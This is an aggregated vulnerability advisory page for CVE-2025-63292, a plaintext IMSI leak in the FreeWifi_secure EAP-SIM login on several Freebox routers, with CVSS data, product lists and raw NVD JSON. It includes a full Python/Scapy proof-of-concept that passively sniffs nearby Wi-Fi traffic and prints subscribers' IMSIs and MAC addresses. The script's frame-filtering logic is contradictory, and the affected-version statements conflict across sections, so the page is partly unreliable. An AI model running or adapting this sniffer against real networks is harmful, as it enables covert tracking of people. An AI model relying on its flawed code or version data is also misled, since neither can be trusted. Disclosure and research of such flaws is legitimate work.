CVE-2025-63292

Description

Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1–r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) were discovered to expose subscribers' IMSI identifiers in plaintext during the initial phase of EAP-SIM authentication over the `FreeWifi_secure` network. During the EAP-Response/Identity exchange, the subscriber's full Network Access Identifier (NAI), which embeds the raw IMSI, is transmitted without encryption, tunneling, or pseudonymization. An attacker located within Wi-Fi range (~100 meters) can passively capture these frames without requiring user interaction or elevated privileges. The disclosed IMSI enables device tracking, subscriber correlation, and long-term monitoring of user presence near any broadcasting Freebox device. The vendor acknowledged the vulnerability, and the `FreeWifi_secure` service is planned for full deactivation by 1 October 2025.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:freebox:v5_hd_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:freebox:v5_hd:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:freebox:v5_crystal_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:freebox:v5_crystal:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:freebox:v6_revolution_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:freebox:v6_revolution:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:freebox:mini_4k_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:freebox:mini_4k:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:freebox:one_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:freebox:one:-:*:*:*:*:*:*:* - NOT VULNERABLE

Freebox v5 HD firmware < 1.7.20

Freebox v5 Crystal firmware < 1.7.20

Freebox v6 Révolution r1-r3 firmware < 4.7.x

Freebox Mini 4K firmware < 4.7.x

Freebox One firmware < 4.7.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-63292 PoC - Freebox FreeWifi_secure IMSI Information Disclosure
This PoC demonstrates passive capture of IMSI from FreeWifi_secure EAP-SIM authentication
Note: Requires monitor mode wireless interface and Scapy library
"""

from scapy.all import sniff, Dot11, EAP, Radius
from scapy.layers.dot11 import RadioTap, Dot11Beacon, Dot11ProbeResp
import re

def parse_eap_identity(pkt):
    """
    Parse EAP-Response/Identity packet to extract NAI containing IMSI
    """
    if pkt.haslayer(EAP):
        eap_layer = pkt.getlayer(EAP)
        if hasattr(eap_layer, 'identity'):
            nai = eap_layer.identity.decode('utf-8', errors='ignore')
            # Extract IMSI from NAI format: IMSI@realm
            imsi_match = re.match(r'^(\d+)@', nai)
            if imsi_match:
                imsi = imsi_match.group(1)
                print(f"[+] Captured IMSI: {imsi}")
                print(f"[+] Full NAI: {nai}")
                print(f"[+] Source MAC: {pkt.addr2}")
                return {'imsi': imsi, 'nai': nai, 'mac': pkt.addr2}
    return None

def packet_handler(pkt):
    """
    Handle captured packets, filter for FreeWifi_secure EAP frames
    """
    # Check for Data frames ( subtype 0x20-0x2f)
    if pkt.haslayer(Dot11) and pkt.type == 2:
        ssid = None
        # Try to extract SSID from probe requests/responses
        if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
            if hasattr(pkt, 'info'):
                try:
                    ssid = pkt.info.decode('utf-8')
                except:
                    pass
        
        # Filter for FreeWifi_secure network
        if ssid == 'FreeWifi_secure' or b'FreeWifi_secure' in bytes(pkt):
            result = parse_eap_identity(pkt)
            if result:
                return result
    
    # Check for EAP over LAN frames
    if pkt.haslayer(Radius):
        result = parse_eap_identity(pkt)
        if result:
            return result
    
    return None

def start_capture(interface='wlan0mon', timeout=60):
    """
    Start passive capture on specified monitor mode interface
    
    Args:
        interface: Wireless interface in monitor mode
        timeout: Capture duration in seconds
    """
    print(f"[*] Starting passive capture on {interface}")
    print("[*] Waiting for FreeWifi_secure EAP-SIM authentication frames...")
    print("[*] Press Ctrl+C to stop")
    
    try:
        packets = sniff(iface=interface, prn=packet_handler, timeout=timeout)
        print(f"\n[+] Captured {len(packets)} packets")
    except KeyboardInterrupt:
        print("\n[!] Capture stopped by user")
    except Exception as e:
        print(f"[!] Error: {e}")
        print("[!] Make sure interface is in monitor mode:")
        print("[!]   sudo ip link set wlan0 down")
        print("[!]   sudo iw dev wlan0 set type monitor")
        print("[!]   sudo ip link set wlan0 up")

if __name__ == '__main__':
    import sys
    interface = sys.argv[1] if len(sys.argv) > 1 else 'wlan0mon'
    start_capture(interface=interface)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63292
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63292
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63292/
[4] VulDB https://vuldb.com/cve/CVE-2025-63292
[5] https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/
[6] https://gist.github.com/7h30th3r0n3/1a0fadb19f1528e3d3f6bad9f680c3b0#file-cve-2025-63292-frebox-imsi-md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63292", "sourceIdentifier": "[email protected]", "published": "2025-11-17T19:16:20.037", "lastModified": "2026-02-04T20:50:13.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1–r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) were discovered to expose subscribers' IMSI identifiers in plaintext during the initial phase of EAP-SIM authentication over the `FreeWifi_secure` network. During the EAP-Response/Identity exchange, the subscriber's full Network Access Identifier (NAI), which embeds the raw IMSI, is transmitted without encryption, tunneling, or pseudonymization. An attacker located within Wi-Fi range (~100 meters) can passively capture these frames without requiring user interaction or elevated privileges. The disclosed IMSI enables device tracking, subscriber correlation, and long-term monitoring of user presence near any broadcasting Freebox device. The vendor acknowledged the vulnerability, and the `FreeWifi_secure` service is planned for full deactivation by 1 October 2025."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebox:v5_hd_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.20", "matchCriteriaId": "54ED083F-0871-4476-80F4-1BEE4A5CB578"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:freebox:v5_hd:-:*:*:*:*:*:*:*", "matchCriteriaId": "516D3417-8A99-4656-977C-FD5176A4D5C9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebox:v5_crystal_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.20", "matchCriteriaId": "0A5FBD32-7294-4ECB-B935-4A2435678C31"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:freebox:v5_crystal:-:*:*:*:*:*:*:*", "matchCriteriaId": "758C1FD9-EC5B-46A7-B5CA-1B866F585BF3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebox:v6_revolution_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.0", "matchCriteriaId": "B03BBFF8-85B1-4292-84FA-B807D89DD104"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:freebox:v6_revolution:-:*:*:*:*:*:*:*", "matchCriteriaId": "2D3D5E82-4E3A-4CC4-AA8E-A7098108C828"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebox:mini_4k_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.0", "matchCriteriaId": "5DD0530C-C5F0-4790-92E2-2F79FDD44B90"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:freebox:mini_4k:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BE098EA-039B-4128-93A3-F6D5F8A9E2F1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebox:one_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.0", "matchCriteriaId": "EE242584-50C0-447D-9BF5-EAB5058DFDA7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:freebox:one:-:*:*:*:*:*:*:*", "matchCriteriaId": "F76B23FD-A78C-4C9F-9712-8F1F3F8D63F4"}]}]}], "references": [{"url": "https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://gist.github.com/7h30th3r0n3/1a0fadb19f1528e3d3f6bad9f680c3b0#file-cve-2025-63292-frebox-imsi-md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}